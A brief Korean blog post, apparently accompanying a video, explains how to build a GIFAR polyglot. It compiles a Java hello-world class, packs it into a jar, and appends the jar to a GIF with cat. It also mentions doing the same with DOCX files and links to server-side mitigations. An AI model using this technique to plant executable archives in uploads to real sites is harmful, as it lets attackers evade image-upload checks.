GIFAR 만들기 동영상

기본 준비 자료
example.gif 파일
helloworld.java 파일

1. java 컴파일 하기
javac helloworld

2. jar 파일 만들기
jar -cf helloworld.jar helloworld.class

3. 공격 gif 파일 만들기
cat example.gif helloworld.jar > gifar.gif

PS. docx로 jar 파일과 겹치는건 file-roller로 겹치게 함

솔직히 공개하는게 두렵기도 했지만 공개 합니다 ^^;
악용하지마세용!!!

GIFAR 공격에 대한 대응 방안 PoC
http://securethoughts.com/2009/01/easy-server-side-fix-for-the-gifar-security-issue/

실제 적용시는 몇 가지 critical한 주의 사항이 있음.
http://heasman.blogspot.com/2008/08/on-gifars.html